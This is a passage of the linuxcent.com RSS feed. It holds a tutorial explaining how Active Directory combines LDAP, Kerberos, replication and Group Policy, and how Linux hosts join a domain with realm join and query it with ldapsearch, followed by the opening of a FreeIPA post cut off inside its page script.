href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&amp;linkname=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Fentra-id-linux-login%2F&#038;title=Entra%20ID%20Linux%20Login%3A%20SSH%20Authentication%20with%20Azure%20AD%20Credentials" data-a2a-url="https://linuxcent.com/entra-id-linux-login/" data-a2a-title="Entra ID Linux Login: SSH Authentication with Azure AD Credentials"></a></p><p>The post <a href="https://linuxcent.com/entra-id-linux-login/">Entra ID Linux Login: SSH Authentication with Azure AD Credentials</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/entra-id-linux-login/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1805</post-id>	</item>
		<item>
		<title>How Active Directory Works: LDAP, Kerberos, and Group Policy Under the Hood</title>
		<link>https://linuxcent.com/active-directory-ldap-kerberos/</link>
					<comments>https://linuxcent.com/active-directory-ldap-kerberos/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Thu, 07 May 2026 11:00:00 +0000</pubDate>
				<category><![CDATA[Identity & Authentication]]></category>
		<category><![CDATA[Active Directory]]></category>
		<category><![CDATA[Identity Management]]></category>
		<category><![CDATA[Kerberos]]></category>
		<category><![CDATA[LDAP]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1796</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span>How Active Directory works under the hood: LDAP storage, Kerberos authentication, USN replication, KCC site topology, GPO delivery — and how Linux joins it.</p>
<p>The post <a href="https://linuxcent.com/active-directory-ldap-kerberos/">How Active Directory Works: LDAP, Kerberos, and Group Policy Under the Hood</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 6</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel; position:relative anchors the absolutely positioned copy button and language badge. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; the chip is reset when the code sits inside a pre. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left-border colour per language family, keyed on the data-lang attribute set on the pre. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: hidden by default, revealed on hover. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
/* Keep the button visible when it has keyboard focus; kept as its own rule so it cannot invalidate the hover rule. */
.lc-copy-btn:focus{opacity:1}
/* Devices without hover (touch) could never reveal the button, so always show it there. */
@media (hover:none){.lc-copy-btn{opacity:1}}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: decorative label in the top-left corner, shown on hover only. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Article tables: full width, bordered cells, zebra striping. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
// Code-block enhancer: gives every <pre> a language badge (when the language is
// known) and a "Copy" button that copies the block's text to the clipboard.
(function(){
  // Guard flag: if the snippet is present more than once on a page, only the first copy runs.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Text of a <pre> that has no <code> child, without the controls injected by this script.
  // Reading pre.innerText directly would put the button label ("Copy") on the clipboard.
  // Works on a detached clone so the live DOM and keyboard focus are untouched; <br> elements
  // become newlines because textContent would otherwise drop them.
  function preText(pre){
    var copy=pre.cloneNode(true);
    copy.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(el){el.parentNode.removeChild(el);});
    copy.querySelectorAll('br').forEach(function(br){br.parentNode.replaceChild(document.createTextNode('\n'),br);});
    return copy.textContent;
  }
  // Decorates every <pre> in the document with the badge and the copy button.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      // The language is taken from a "language-xyz" class on the <code> element, if there is one.
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang); // hook for the pre[data-lang=...] border colours in the stylesheet
        var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      btn.type='button'; // never behave as a submit button if the <pre> sits inside a form
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        // Read the text at click time so later changes to the block are picked up.
        var text=code?code.innerText:preText(pre);
        // Prefer the async Clipboard API; fall back to execCommand when it is unavailable or rejects.
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Success feedback: show "Copied!" for two seconds, then restore the label.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  // Failure feedback: show the failure label for two seconds, then restore the label.
  function failed(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  // Fallback copy through a temporary off-screen <textarea> and document.execCommand('copy').
  function fb(text,btn){
    var ta=document.createElement('textarea');
    var copied=false;
    try{
      ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);ta.select();
      // execCommand returns false when the copy was refused; only a true result counts as success.
      copied=document.execCommand('copy');
    }catch(e){copied=false;}
    finally{if(ta.parentNode)ta.parentNode.removeChild(ta);} // always remove the helper element, even after an exception
    if(copied){ok(btn);}else{failed(btn);}
  }
  // Run immediately if the DOM is already parsed, otherwise wait for DOMContentLoaded.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>The Identity Stack, Episode 9</em><br />
<a href="/freeipa-linux-identity-management/">EP08: FreeIPA</a> → <strong>EP09</strong> → <a href="/saml-vs-oidc-vs-oauth2/">EP10: SAML/OIDC</a> → &#8230;</p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Active Directory is not a product that happens to use LDAP — it <em>is</em> an LDAP directory with a Microsoft-extended schema, a built-in Kerberos KDC, and DNS tightly integrated</li>
<li>Replication uses USNs (Update Sequence Numbers) and GUIDs — the Knowledge Consistency Checker (KCC) automatically builds the replication topology</li>
<li>Sites and site links tell AD which DCs are physically close — AD prefers to authenticate users against a DC in the same site to minimize WAN latency</li>
<li>Group Policy Objects (GPOs) are stored as LDAP entries (in the <code class="" data-line="">CN=Policies</code> container) and Sysvol files — LDAP tells clients which GPOs apply; Sysvol delivers the policy files</li>
<li>Linux joins AD via <code class="" data-line="">realm join</code> (uses adcli + SSSD) or <code class="" data-line="">net ads join</code> (Samba + winbind) — both register a machine account in AD and get a Kerberos keytab</li>
<li>The difference between Linux in AD and Linux in FreeIPA: AD is optimized for Windows; FreeIPA is optimized for Linux — both interoperate</li>
</ul>
<hr />
<h2 id="the-big-picture-what-ad-actually-is">The Big Picture: What AD Actually Is</h2>
<pre><code class="" data-line="">Active Directory Domain: corp.com
┌────────────────────────────────────────────────────────────┐
│                                                            │
│  LDAP directory          Kerberos KDC                      │
│  ─────────────           ──────────                        │
│  Schema: 1000+ classes   Realm: CORP.COM                   │
│  Objects: users, groups, Issues TGTs + service tickets     │
│  computers, GPOs, OUs    Uses LDAP as the account DB       │
│                                                            │
│  DNS                     Sysvol (DFS share)                │
│  ────                    ────────────────                  │
│  SRV records for KDC     GPO templates                     │
│  and LDAP discovery      Login scripts                     │
│                          Replicated via DFSR               │
│                                                            │
│  Replication engine: USN + GUID + KCC                      │
└────────────────────────────────────────────────────────────┘
          │ replicates to          │ replicates to
          ▼                        ▼
   DC: dc02.corp.com        DC: dc03.corp.com
</code></pre>
<p>EP08 showed FreeIPA as the Linux-native answer to enterprise identity. AD is the Microsoft answer — and because most enterprises run Windows clients, understanding AD is unavoidable for Linux infrastructure engineers. This episode goes behind the LDAP and Kerberos protocols to explain what makes AD specifically work.</p>
<hr />
<h2 id="the-ad-schema-ldap-with-1000-object-classes">The AD Schema: LDAP With 1000+ Object Classes</h2>
<p>AD&#8217;s schema extends the base LDAP schema with Microsoft-specific classes and attributes. Every user object is a <code class="" data-line="">user</code> class (which extends <code class="" data-line="">organizationalPerson</code> which extends <code class="" data-line="">person</code> which extends <code class="" data-line="">top</code>) with additional attributes like:</p>
<pre><code class="" data-line="">sAMAccountName   ← the pre-Windows 2000 login name (vamshi)
userPrincipalName ← the modern UPN (vamshi@corp.com)
objectGUID       ← a globally unique 128-bit identifier (never changes, even if DN changes)
objectSid        ← Windows Security Identifier (used for ACL enforcement on Windows)
whenCreated      ← creation timestamp
pwdLastSet       ← password change timestamp
userAccountControl ← bitmask: disabled, locked, password never expires, etc.
memberOf         ← back-link: groups this user belongs to
</code></pre>
<p><code class="" data-line="">objectGUID</code> is the authoritative identifier in AD — not the DN. When a user is renamed or moved to a different OU, the GUID stays the same. Applications that store a user&#8217;s DN will break on rename; applications that store the GUID won&#8217;t.</p>
<p><code class="" data-line="">userAccountControl</code> is the bitmask that controls account state:</p>
<pre><code class="" data-line="">Flag                Value   Meaning
ACCOUNTDISABLE      2       Account disabled
LOCKOUT             16      Account locked out
PASSWD_NOTREQD      32      Password not required
NORMAL_ACCOUNT      512     Normal user account (set on almost all accounts)
DONT_EXPIRE_PASSWD  65536   Password never expires
</code></pre>
<pre><code class="" data-line=""># Query AD from a Linux machine
ldapsearch -x -H ldap://dc.corp.com \
  -D &quot;vamshi@corp.com&quot; -w password \
  -b &quot;dc=corp,dc=com&quot; \
  &quot;(sAMAccountName=vamshi)&quot; \
  sAMAccountName userPrincipalName objectGUID memberOf userAccountControl
</code></pre>
<hr />
<h2 id="replication-usn-guid-kcc">Replication: USN + GUID + KCC</h2>
<p>AD replication is multi-master — every DC accepts writes. The replication engine uses:</p>
<p><strong>USN (Update Sequence Number)</strong> — a per-DC counter that increments on every local write. Each object records the USN at which it was created and last modified (<code class="" data-line="">uSNCreated</code>, <code class="" data-line="">uSNChanged</code>), and the per-attribute replication metadata (<code class="" data-line="">replPropertyMetaData</code>) records the USN of each attribute&#8217;s last change. When DC-A replicates to DC-B, DC-B asks: &#8220;give me everything you&#8217;ve changed since the last USN I saw from you.&#8221;</p>
<p><strong>GUID</strong> — each object has a globally unique identifier. If the same attribute is modified on two DCs before replication (a conflict), the conflict is resolved at the attribute level: the value with the higher attribute version number wins; if the version numbers are equal, the later modification timestamp wins (last-writer-wins); if the timestamps are also equal, the value from the originating DC with the higher GUID wins.</p>
<p><strong>KCC (Knowledge Consistency Checker)</strong> — a component that runs on every DC and automatically constructs the replication topology. You don&#8217;t configure which DCs replicate to which — the KCC builds a minimum spanning tree that ensures every DC is connected to every other within a set number of hops. You configure Sites and site links; the KCC does the rest.</p>
<pre><code class="" data-line=""># Check replication status from a Linux machine (requires rpcclient or adcli)
# Or on the DC: repadmin /showrepl (Windows tool)

# Simulate: query the highestCommittedUSN from a DC
ldapsearch -x -H ldap://dc.corp.com \
  -D &quot;vamshi@corp.com&quot; -w password \
  -b &quot;&quot; -s base highestCommittedUSN
</code></pre>
<hr />
<h2 id="sites-and-site-links">Sites and Site Links</h2>
<p>Sites are AD&#8217;s concept of physical network topology. A site is a set of IP subnets with high-bandwidth connectivity between them. Site links represent the WAN connections between sites.</p>
<pre><code class="" data-line="">Site: Mumbai              Site: Hyderabad
┌────────────────┐        ┌────────────────┐
│ DC: dc-mum-01  │        │ DC: dc-hyd-01  │
│ DC: dc-mum-02  │        │ DC: dc-hyd-02  │
│ subnet: 10.1/16│        │ subnet: 10.2/16│
└───────┬────────┘        └────────┬───────┘
        │                          │
        └──── Site Link ───────────┘
              Cost: 100
              Replication interval: 15 min
</code></pre>
<p>When a user in Mumbai authenticates, the client&#8217;s DC locator finds a DC in the same site using DNS SRV records. The SRV records include the site name in the service name: <code class="" data-line="">_ldap._tcp.Mumbai._sites.dc._msdcs.corp.com</code>. SSSD and Windows clients query site-local SRV records first.</p>
<p>If no DC is available in the local site, authentication falls back to a DC in another site across the WAN link. Configuring sites correctly keeps authentication on local DCs, so a slow or failed WAN link does not stall logins in the local site.</p>
<hr />
<h2 id="group-policy-ldap-sysvol">Group Policy: LDAP + Sysvol</h2>
<p>GPOs are stored in two places:</p>
<p><strong>LDAP</strong> — the <code class="" data-line="">CN=Policies,CN=System,DC=corp,DC=com</code> container holds GPO metadata objects. Each GPO has a GUID, a display name, and version numbers. The <code class="" data-line="">gPLink</code> attribute on OUs and the domain root links GPOs to where they apply.</p>
<p><strong>Sysvol</strong> — the actual policy templates and scripts live in <code class="" data-line="">\\corp.com\SYSVOL\corp.com\Policies\{GPO-GUID}\</code>. Sysvol is a DFS-R (Distributed File System Replication) share replicated to every DC.</p>
<p>When a Windows client applies Group Policy:</p>
<ol>
<li>LDAP query: what GPOs are linked to my OU chain?</li>
<li>Sysvol fetch: download the policy templates from the GPO&#8217;s Sysvol path</li>
<li>Apply: process Registry settings, Security settings, Scripts</li>
</ol>
<p>Linux clients don&#8217;t process GPOs natively. The <code class="" data-line="">adcli</code> and <code class="" data-line="">sssd</code> tools interpret a small subset of AD policy (password policy, account lockout) via LDAP. Full GPO processing on Linux requires Samba&#8217;s <code class="" data-line="">samba-gpupdate</code> or third-party tools.</p>
<hr />
<h2 id="joining-linux-to-ad">Joining Linux to AD</h2>
<h3 id="realm-join-recommended">realm join (recommended)</h3>
<pre><code class="" data-line=""># Install required packages
dnf install -y realmd sssd adcli samba-common

# Discover the domain
realm discover corp.com
# corp.com
#   type: kerberos
#   realm-name: CORP.COM
#   domain-name: corp.com
#   configured: no
#   server-software: active-directory
#   client-software: sssd

# Join
realm join corp.com -U Administrator
# Prompts for Administrator password
# Creates machine account in AD
# Configures sssd.conf, krb5.conf, nsswitch.conf, pam.d automatically

# Verify
realm list
id vamshi@corp.com
</code></pre>
<h3 id="what-the-join-does">What the join does:</h3>
<ol>
<li>Creates a machine account <code class="" data-line="">HOSTNAME$</code> in <code class="" data-line="">CN=Computers,DC=corp,DC=com</code></li>
<li>Sets a machine password (rotated automatically by SSSD)</li>
<li>Retrieves a Kerberos keytab to <code class="" data-line="">/etc/krb5.keytab</code></li>
<li>Configures SSSD with <code class="" data-line="">id_provider = ad</code>, <code class="" data-line="">auth_provider = ad</code></li>
<li>Updates <code class="" data-line="">/etc/nsswitch.conf</code> to include <code class="" data-line="">sss</code></li>
<li>Updates <code class="" data-line="">/etc/pam.d/</code> to include <code class="" data-line="">pam_sss</code></li>
</ol>
<p>After joining, SSSD uses the machine&#8217;s Kerberos keytab to authenticate to the DC and query LDAP — no hardcoded service account credentials required.</p>
<hr />
<h2 id="ldap-queries-against-ad-from-linux">LDAP Queries Against AD from Linux</h2>
<pre><code class="" data-line=""># Find a user (after kinit or with -w password)
ldapsearch -Y GSSAPI -H ldap://dc.corp.com \
  -b &quot;dc=corp,dc=com&quot; \
  &quot;(sAMAccountName=vamshi)&quot; \
  sAMAccountName mail memberOf

# Find all members of a group
ldapsearch -Y GSSAPI -H ldap://dc.corp.com \
  -b &quot;dc=corp,dc=com&quot; \
  &quot;(cn=engineers)&quot; \
  member

# Find all AD-joined Linux machines
ldapsearch -Y GSSAPI -H ldap://dc.corp.com \
  -b &quot;dc=corp,dc=com&quot; \
  &quot;(&amp;(objectClass=computer)(operatingSystem=*Linux*))&quot; \
  cn operatingSystem lastLogonTimestamp

# Find disabled accounts
ldapsearch -Y GSSAPI -H ldap://dc.corp.com \
  -b &quot;dc=corp,dc=com&quot; \
  &quot;(userAccountControl:1.2.840.113556.1.4.803:=2)&quot; \
  sAMAccountName
</code></pre>
<p>The last filter uses an LDAP extensible match with the matching rule <code class="" data-line="">1.2.840.113556.1.4.803</code>, the OID for bitwise AND. <code class="" data-line="">userAccountControl:1.2.840.113556.1.4.803:=2</code> means &#8220;entries where userAccountControl AND 2 equals 2&#8221; — i.e., the ACCOUNTDISABLE bit is set. The extensible-match filter syntax is standard LDAP; the bitwise-AND matching rule itself is a Microsoft AD extension, so other directory servers may not support it.</p>
<hr />
<h2 id="common-misconceptions"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Common Misconceptions</h2>
<p><strong>&#8220;AD is just Microsoft&#8217;s LDAP.&#8221;</strong> AD is LDAP + Kerberos + DNS + DFS-R + GPO, all tightly integrated and with a schema that the Microsoft ecosystem depends on. You can query AD with standard <code class="" data-line="">ldapsearch</code>. You cannot replace it with OpenLDAP without breaking every Windows client.</p>
<p><strong>&#8220;Linux machines in AD get GPO.&#8221;</strong> Linux machines appear in AD and can be organized into OUs. Standard GPOs don&#8217;t apply to them. Samba&#8217;s <code class="" data-line="">samba-gpupdate</code> can process a subset of AD policy for Linux — mostly Registry and Security settings mapped to Linux equivalents.</p>
<p><strong>&#8220;realm leave removes the machine cleanly.&#8221;</strong> <code class="" data-line="">realm leave</code> removes local configuration but does not delete the machine account from AD. The stale computer object stays in <code class="" data-line="">CN=Computers</code> until an AD admin deletes it. Always run <code class="" data-line="">realm leave &amp;&amp; adcli delete-computer -U Administrator</code> for a clean removal.</p>
<hr />
<h2 id="framework-alignment">Framework Alignment</h2>
<table>
<thead>
<tr>
<th>Domain</th>
<th>Relevance</th>
</tr>
</thead>
<tbody>
<tr>
<td>CISSP Domain 5: Identity and Access Management</td>
<td>AD is the dominant enterprise identity store — understanding its LDAP structure, Kerberos realm, and GPO model is essential for IAM in mixed environments</td>
</tr>
<tr>
<td>CISSP Domain 4: Communications and Network Security</td>
<td>AD replication traffic (RPC, LDAP, Kerberos) is a significant portion of enterprise WAN traffic — Sites and site links are a network security and performance design decision</td>
</tr>
<tr>
<td>CISSP Domain 3: Security Architecture and Engineering</td>
<td>AD forest/domain/OU hierarchy is an architectural decision with long-term security consequences — getting OU structure wrong constrains GPO delegation for years</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>AD is LDAP + Kerberos + DNS + GPO + DFS-R — not a product that &#8220;uses&#8221; these; they&#8217;re the implementation</li>
<li>Replication is multi-master via USN + GUID; the KCC builds the topology automatically from Sites configuration</li>
<li><code class="" data-line="">objectGUID</code> is the stable identifier — not the DN, which changes on rename/move</li>
<li><code class="" data-line="">realm join</code> is the correct way to join Linux to AD — it configures SSSD, Kerberos, PAM, and NSS correctly in one command</li>
<li><code class="" data-line="">userAccountControl</code> is the bitmask that controls account state — <code class="" data-line="">(userAccountControl:1.2.840.113556.1.4.803:=2)</code> finds disabled accounts</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP09 covered AD — LDAP and Kerberos inside the corporate network. EP10 covers what happens when identity needs to work across the internet, where Kerberos doesn&#8217;t reach: SAML, OAuth2, and OIDC — the protocols that let identity leave the building.</p>
<p><em>Next: <a href="/saml-vs-oidc-vs-oauth2/">SAML vs OIDC vs OAuth2: Which Protocol Handles Which Identity Problem</a></em></p>
<p>Get EP10 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" 
href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&amp;linkname=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Factive-directory-ldap-kerberos%2F&#038;title=How%20Active%20Directory%20Works%3A%20LDAP%2C%20Kerberos%2C%20and%20Group%20Policy%20Under%20the%20Hood" data-a2a-url="https://linuxcent.com/active-directory-ldap-kerberos/" data-a2a-title="How Active Directory Works: LDAP, Kerberos, and Group Policy Under the Hood"></a></p><p>The post <a href="https://linuxcent.com/active-directory-ldap-kerberos/">How Active Directory Works: LDAP, Kerberos, and Group Policy Under the Hood</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/active-directory-ldap-kerberos/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1796</post-id>	</item>
		<item>
		<title>FreeIPA: LDAP + Kerberos + PKI in a Single Linux Identity Stack</title>
		<link>https://linuxcent.com/freeipa-linux-identity-management/</link>
					<comments>https://linuxcent.com/freeipa-linux-identity-management/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Thu, 07 May 2026 05:00:00 +0000</pubDate>
				<category><![CDATA[Identity & Authentication]]></category>
		<category><![CDATA[FreeIPA]]></category>
		<category><![CDATA[HBAC]]></category>
		<category><![CDATA[Identity Management]]></category>
		<category><![CDATA[Kerberos]]></category>
		<category><![CDATA[LDAP]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[linux-security]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1793</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 5</span> <span class="rt-label rt-postfix">minutes</span></span>FreeIPA combines 389-DS, MIT Kerberos, Dogtag PKI, and Bind DNS into one Linux identity stack. Set up HBAC rules, centralized sudo, and AD trust.</p>
<p>The post <a href="https://linuxcent.com/freeipa-linux-identity-management/">FreeIPA: LDAP + Kerberos + PKI in a Single Linux Identity Stack</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 5</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel; position:relative anchors the absolutely positioned copy button and language badge. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code nested inside a code block inherits the dark panel instead. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left-border accent per language family; data-lang is set on each pre by the enhancer script below. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: pinned to the top-right corner of the code block, hidden until needed. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
/* Keyboard users never hover: reveal the button when it takes focus so it is not an invisible tab stop. */
.lc-copy-btn:focus{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
/* State class toggled by the script for two seconds after a successful copy. */
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: purely decorative label in the top-left corner, shown on hover only. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Article tables: full-width grid with a shaded header row and zebra striping. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
/* Code-block enhancer: tags every pre element with its language, adds a language
   badge and a "Copy" button, and copies the block's text to the clipboard on click. */
(function(){
  // Each post embeds its own copy of this script; the window flag lets only the first copy run.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Decorate every pre element currently in the document.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      // The language comes from a "language-xxx" class on the inner code element, when present.
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        // data-lang selects the per-language border colour in the stylesheet.
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');
        badge.className='lc-lang-badge';badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      // Explicit type: a bare button defaults to "submit" and would submit an enclosing form.
      btn.type='button';
